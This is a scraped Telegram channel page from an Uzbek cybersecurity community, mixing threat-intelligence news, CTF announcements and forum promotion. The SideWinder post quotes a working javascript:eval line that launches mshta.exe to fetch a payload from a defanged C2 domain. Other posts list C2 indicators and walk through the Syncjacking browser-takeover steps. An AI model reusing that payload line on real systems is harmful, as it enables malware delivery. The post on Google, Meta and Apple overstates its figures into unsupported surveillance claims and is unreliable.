CentiSec
841 subscribers
125 photos
3 videos
1 file
95 links
Biz shunchaki o'rganuvchilarmiz.

Forum — https://t.me/+XfDNbo3_oLZhYTY8

@centihack
Download Telegram
CentiSec Red Teamsaralash bosqichi

Ertangi musobaqada barcha jamoalarga CentiSec nomidan omad tilaymiz!

@CentiSec
🔥25
CentiSec Red Team Final

Saralash bosqichidan muvaffaqiyatli o'tgan jamoalar ro'yxatini ko'rishingiz mumkin

Quyidagi jamoalarga omad tilaymiz va finalda ko'rishamiz degan umiddamiz, barcha qatnashuvchilarga tashakkur!

@CentiSec
🔥20
Forum only for hackers!

Xakerlarni bir joyga to'plash vaqti keldi, CentiSec o'z forumini yuritishni boshladi

U yerda soha mutaxassislari bilan muloqot olib borishingiz mumkin faqat axloq bilan.

Yaqin oralarda bu forum-ga faqat pul to'lab kira olishingiz mumkin bo'ladi shunday ekan hozirda u yerda ham sizga joy bor 😎

🔗 Forum LINK: https://t.me/+XfDNbo3_oLZhYTY8

@CentiSec
🔥981
⚠️Bizning kanal postlari quyidagi tartibdagi hashtaglar bilan joylanadi:

#️⃣ #CentiNews – Kiberxavfsizlik olamidagi eng so‘nggi yangiliklar, dolzarb voqealar va e’lonlar.
Dunyo o‘zgarar ekan, sen ham xabardor bo‘lishing kerak!


#️⃣ #CentiStudy – Foydali kurslar, maqolalar va kitoblar. Ilmga chanqoq har bir inson uchun mustahkam bilim manbai!
O‘rgan, rivojlan, vaqtingni bekorga sarf qilma!


#️⃣ #CentiBugBounty – Haqiqiy hackerlar daromad topadigan maydon!
Bug bounty platformalari, eksploitlar va zaifliklarni tahlil qilish bo‘yicha eng foydali postlar shu yerda.


#️⃣ #CentiPentest – Penetration testing bo‘yicha chuqur tahlillar, vositalar va strategiyalar.
Hujum qilishni o‘rganib, himoyalanishni mustahkamla!


#️⃣ #CentiPartners – Hamkorlarimiz, jamoaviy loyihalar va do‘stona aloqalar.
Yakka holda muvaffaqiyat qozonish qiyin, kuchli jamoa esa cheksiz imkoniyatlar yaratadi!


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!
Please open Telegram to view this post
VIEW IN TELEGRAM
187🗿1
#️⃣ #CentiNews

🏴‍☠️Petr Levashov, kiberjinoyatchilik dunyosida "Severa" taxallusi bilan tanilgan rossiyalik dasturchi, botnetlar yaratish va boshqarish bilan mashhur bo‘lgan. U Storm Worm, Waledac va Kelihos kabi zararli tarmoqlarni ishlab chiqqan bo‘lib, ular spam tarqatish, DDoS hujumlarini amalga oshirish va zararli dasturlarni yoyish uchun ishlatilgan.

2017-yilda Levashov Ispaniyaning Barselona shahrida AQSh talabi bilan hibsga olingan va keyinchalik AQShga ekstraditsiya qilingan. Sud jarayonidan so‘ng, u 2021-yilda ozodlikka chiqqan.

Gazeta.ru tomonidan olib borilgan surishtiruvga ko‘ra, Levashov ozodlikka chiqqanidan keyin AQSh Federal Tergov Byurosi (FBI) bilan hamkorlik qila boshlagan bo‘lishi mumkin. U "Bratva" taxallusi ostida rusiyzabon kiberjinoyatchilik tarmoqlari haqida ma’lumot to‘plagani taxmin qilinmoqda.


Batafsil:
🌐 Gazeta.ru


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
984
#️⃣ #CentiNews

"FutureSeeker" guruhi bugun TrumpHotels(.)com tizimini buzganini da'vo qildi. Ular mehmonlarning bron qilish eslatmalari va tasdiqlash xizmatlariga bog‘liq bo‘lgan elektron pochta tizimiga kirish imkoniyatiga ega bo‘lgan. O‘g‘irlangan ma’lumotlar orasida 164,910 ta yozuv mavjud bo‘lib, ularda quyidagilar aks etgan:


Unikal ID (SQL jadvali)
Ism va familiya
Elektron pochta
Yaratilgan sana
Holat va oxirgi yangilanish vaqti
Amal qilish muddati


Ma’lumotlar 2018-yil 18-yanvardan 2025-yil 15-yanvargacha bo‘lgan davrni qamrab oladi. Shunga qaramay, ularda mehmonlarning yashash manzili yoki chiqish sanalari mavjud emas, shuningdek, shaxsiy ma’lumotlar (PII) ham kiritilmagan.


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
732
#️⃣ #CentiNews


Seqrite Labs tadqiqotchilari ilgari nomaʼlum boʻlgan "Silent Lynx" guruhi tomonidan Qirgʻiziston va Turkmanistondagi turli tashkilotlarga qaratilgan hujumlarni ochib berdi.

Tadqiqotchilarning taʼkidlashicha, ilgari bu guruh Sharqiy Yevropa va Markaziy Osiyodagi moliyaviy tahlil va iqtisodiy prognozlar bilan bogʻliq tashkilotlarga qaratilgan kampaniyalarda koʻrilgan.Hakerlar guruhining yangi hujumlarining maqsadlari orasida diplomatik muassasalar xodimlari, huquqshunoslar, davlat banklari va tahlil markazlari vakillari bor.Infektsiya RAR arxivi shaklidagi firibgarlik xati orqali boshlanadi, oxir-oqibatda buzilgan hostlarga masofadan kirishni taʼminlaydigan zararli maʼlumotlarni yetkazib beradi.2024-yil 27-dekabrda aniqlangan ikkita kampaniyadan birinchisi ISO faylini ishga tushirish uchun RAR arxividan foydalanadi, bu esa oʻz navbatida zararli C++ binariy fayli va soxta PDF faylini oʻz ichiga oladi.Keyin bajariladigan fayl Telegram botlaridan (south_korea145_bot va south_afr_angl_bot nomlari bilan) buyruqlarni bajarish va maʼlumotlarni olish uchun PowerShell skriptini ishga tushiradi.Botlar orqali bajariladigan baʼzi buyruqlar orasida qoʻshimcha foydali yuklarni masofaviy serverdan (pweobmxdlboi[.]com) yoki Google Diskdan yuklash va saqlash uchun curl buyruqlari mavjud.Boshqa kampaniyada ikkita fayldan iborat zararli RAR arxivi qoʻllaniladi: soxta PDF fayli va boshqariladigan serverga (185.122.171[.]22:8082) teskari shell yaratish uchun moʻljallangan Golang bajariladigan fayli.Seqrite Labs maʼlumotlariga koʻra, Silent Lynx va YoroTrooper (SturgeonPhisher, ilgari Cisco Talos tomonidan ham profilangan) oʻrtasida baʼzi taktikaviy oʻxshashliklar aniqlangan, ular MDH davlatlariga qaratilgan hujumlar bilan bogʻliq.

Telegram botlaridan C2 uchun foydalanish, soxta hujjatlar va mintaqaviy nishonga olish ularning Markaziy Osiyo va SPECA mamlakatlaridagi josuslik faoliyatiga qaratilganligini taʼkidlaydi.


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
12🗿441
#️⃣ #CentiNews

⚠️SquareX tadqiqotchilari tomonidan "Syncjacking" hujumi, zararlangan foydalanuvchining brauzerini qo‘lga kiritish imkonini beruvchi usul bo‘lib, u aslida zararsiz ko‘rinadigan Chrome kengaytmasi orqali amalga oshiriladi. Hujumni amalga oshirish qiyin bo‘lsa-da, uni amalga oshirish uchun minimal ruxsatlar va ozgina ijtimoiy muhandislik (social engineering) yetarli.

Hujum quyidagi bosqichlardan iborat:

1️⃣Hujumchi birinchi navbatda domen yaratadi va ikki bosqichli autentifikatsiyani o‘chirib qo‘ygan holda Google Workspace hisobini ro‘yxatdan o‘tkazadi. Keyinchalik, bu domen foydalanuvchi qurilmasidagi profilni bog‘lash uchun foydalaniladi.

2️⃣ Keyin, Chrome do‘konida funksional brauzer kengaytmasi yaratiladi va nashr etiladi. Hujumchi ijtimoiy muhandislik usullaridan foydalanib, foydalanuvchini o‘zi kerakli kengaytmani o‘rnatishga ko‘ndiradi. Kengaytma yashirin brauzer oynasida Google Workspace boshqariladigan profiliga kirishni amalga oshiradi.

3️⃣ Keyin, kengaytma Google yordam sahifasini ochadi va u yerda o‘qish va yozish huquqlaridan foydalanib, Chrome sinxronizatsiyasini yoqishga chaqiradigan soxta xabarni joylashtiradi. Foydalanuvchi rozilik berganidan so‘ng, barcha saqlangan maʼlumotlar hujumchi uchun ochiq bo‘ladi.

4️⃣Lekin bu hammasi emas! Profil buzilgandan so‘ng, hujumchi brauzerning to‘liq nazoratini qo‘lga kiritishga harakat qiladi. Tadqiqotchilar tomonidan ko‘rib chiqilgan bir stsenariyda, kengaytma Zoom yangilash sahifasini almashtirib, yangi mijozni o‘rnatishni taklif qiladi. Bu mijoz aslida Google boshqariladigan domenida ro‘yxatdan o‘tish tokeni bilan ijro etiladigan fayl bo‘lib, hujumchilarga brauzerga to‘liq kirish huquqini beradi.


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
1242👍1
🗣Hurmatli do‘stlar, bizning jamoamiz rivojlanishda davom etmoqda! Kanalimizni yanada kuchliroq qilish va ko‘proq odamga yetib borish uchun Sizning yordamingiz muhim!


https://t.me/boost/CentiSec


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
256
#️⃣ #CentiNews

⚠️Bugun Tailandning Kiber Jinoyatlar bo‘yicha Tergov Byurosi 8Base ransomware guruhi ortida turgan deb taxmin qilinayotgan 4 kishining hibsga olinganini e’lon qildi. 

Ushbu 4 kishi faqat 2 erkak va 2 ayol sifatida aniqlangan. Ularning barchasi yevropalik ekani ma’lum. Tailand rasmiylari 40 dan ortiq buyum dalil sifatida musodara qilinganini aytdi. Ularga elektron qurilmalar va raqamli hamyonlar ham kiradi. Shveytsariya ushbu shaxslarning ekstraditsiyasini talab qilgan. Hibsga olinganlar butun dunyo bo‘ylab 16 million dollardan ortiq mablag‘ o‘g‘irlaganlikda gumon qilinmoqda.



Batafsil: https://techcrunch.com/2025/02/10/global-police-operation-seizes-8base-ransomware-gang-leak-site/



Why waste time? Join the community today!

✉️ Telegram              Forum
🌐 Linkedin               🌐 Web
📷 Instagram            📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
15👍4
⚠️EclecticIQ tahlilchilarining izlanishlariga ko'ra, Rossiya Bosh razvedka boshqarmasi (GRU) qo‘llab-quvvatlovchi Sandworm (APT44) guruhi Ukraina Windows foydalanuvchilariga qarshi kiberjosuslik taxdidlarini amalga oshirmoqda. Ushbu hujumlar 2023-yil oxiridan boshlab davom etib, Rossiyaning Ukrainaga bostirib kirishi ortidan kuchaygan.

Hakerlar zararli dasturlarni tarqatish uchun:

Pirat Microsoft Key Management Service (KMS) aktivatorlaridan,
Soxta Windows yangilanishlaridan foydalanmoqda.

Bu orqali BACKORDER (loader) ni yangi versiyasi tarqatishmoqda. Oldindan Sandworm bilan bog‘liq bo‘lgan ushbu mehanizm Dark Crystal RAT (DcRAT) zararli dasturini tizimlarga o‘rnatib, hujumchilarga quyidagilarni amalga oshirish imkonini beradi:

Maxfiy ma’lumotlarni o‘g‘irlash,
Kiberjosuslik operatsiyalarini o‘tkazish,
Zararli faoliyatni davom ettirish uchun tizimlarni boshqarish.


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
20👍3
#️⃣ #CentiNews

🔵Bugun CentiSec kichik CTF musobaqasini o‘tkazadi. Imkoniyatingizni sinab ko‘ring!

💬 Shartlar oddiy:
Berilgan vazifani yechib, 1 TON mukofotga ega bo‘ling.

CTF tafsilotlari va topshiriq tez orada e’lon qilinadi. Tayyor turing!


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
25👍9
photo_2025-02-19_08-47-19.jpg
259.2 KB
#️⃣ #CentiCTF

Task: 🌐OSINT

Javob shakli:

Mobil qurilma:
Latitude (kenglik)
longitude (uzunlik)

Radius (100 metr) farq qilishi mumkin

➡️Javobini @CentiSecadmin

Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
22👍4
#️⃣ #CentiNews

🥷\UAC-0212 guruhi Ukraina infrastrukturasi obyektlariga kiberhujumlarni amalga oshirish maqsadida avtomatlashtirish va texnologik jarayonlarni boshqarish yechimlarini ishlab chiquvchilar hamda yetkazib beruvchilarga qaratilgan faoliyatini olib bormoqda.

2024-yilning ikkinchi yarmidan boshlab, yangi taktikalar, texnikalar va protseduralar kuzatilmoqda. Jumladan, jabrlanuvchiga PDF hujjati yuborilib, ushbu hujjatda keltirilgan havolaga bosish orqali CVE-2024-38213 zaifligidan foydalanish natijasida tizimga "pdf.lnk" kengaytmali LNK fayli yuklab olinadi. Ushbu fayl ishga tushirilganda, PowerShell buyrug‘ini bajarish orqali qurbonning kompyuteriga zararli hujjat yuklab va ko‘rsatiladi, shuningdek EXE/DLL fayllarni yuklash, ularning doimiyligini ta’minlash (Windows "Run" bo‘limi orqali) va ishga tushirish amalga oshiriladi.

Ma’lumki, ushbu kiber tahdidni amalga oshirishda quyidagi dasturiy vositalar ishlatilgan: SECONDBEST / EMPIREPAST, SPARK, CROOKBAG (GoLang yuklovchi). Shu bilan birga, ayrim holatlarda hujjatlarni uzoq muddat davomida o‘g‘irlash uchun RSYNC ham ishlatilgan.


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
15👍2
#️⃣ Google, Meta va Apple 3 millionga yaqin foydalanuvchilarning ma’lumotlarini Amerikaga yetkazib kelyapti

— Proton bergan ma’lumotiga ko’ra, texnik gigantlar, ya’ni Google, Meta va Apple Amerikaning maxsus bo’linmalari va havfsizlik bo’linmalari uchun ma’lumotlar yetkazuvchi sifatida gavdalandi.

💬 Oxirgi 12 oy davomida amerikalik bo’linmalar 500 minga yaqin Google va Meta kompaniyalariga so’rov yuborgan.

Bu shuni anglatadiki Amerika yirik bo’lgan IT gigantlarini kuzatuv uchun foydalanib kelayapti.

Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍2
#️⃣ #CentiNews

🔵Bugun CentiSec kichik CTF musobaqasini o‘tkazadi. Imkoniyatingizni sinab ko‘ring!

💬 Shartlar oddiy:
Berilgan vazifani yechib, 1 TON mukofotga ega bo‘ling.

CTF tafsilotlari va topshiriq tez orada e’lon qilinadi. Tayyor turing!


Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
15👍6
👽 SideWinder yangilangan qurollanish asboblar to'plami bilan dengiz va yadro sektorlariga mo'ljallangan

APT guruhi turli sohalarga katta qiziqish uyg'otadi va hujumlarning katta geografiyasi bilan tanishing:

Guruh o'z faoliyatini, ayniqsa Afrikada yanada kengaytirdi. Hujumlar Avstriya, Bangladesh, Kambodja, Jibuti, Misr, Indoneziya, Mozambik, Myanma, Nepal, Pokiston, Filippin, Shri-Lanka, Birlashgan Arab Amirliklari va Vetnamda aniqlangan.
So‘nggi hujumlarda SideWinder Afg‘oniston, Jazoir, Bolgariya, Xitoy, Hindiston, Maldiv orollari, Ruanda, Saudiya Arabistoni, Turkiya va Ugandadagi diplomatik vakolatxonalarni ham nishonga oldi.

🤛Dastlabki infektsiya, har doimgidek, eng samarali - eski Microsoft Office zaifligidan foydalanish, CVE-2017-1188

Zararli ilovali fishing xabari > RTF ekspluatatsiyasi >
javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe)
hxxps://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();")


Ko'rib turganimizdek, mshta ishga tushirildi, u C2 dan hta faylini yuklashi kerak, keyin qonuniy jarayon bilan yuklangan Backdoor Loader kutubxonasi yuklanadi.
Hujum quyidagi nomlarga ega edi:

propsys.dll
vsstrace.dll
JetCfg.dll
Policymanager.dll
winmm.dll
xmllite.dll
dcntele.dll
UxTheme.dll


Bu kutubxona Stealer Bot implantini xotiraga yuklash uchun kerak.

🔗 Source.

Why waste time? Join the community today!

✉️ Telegram Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok

Biz shunchaki o'rganuvchilarmiz !!!

@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
1012👍7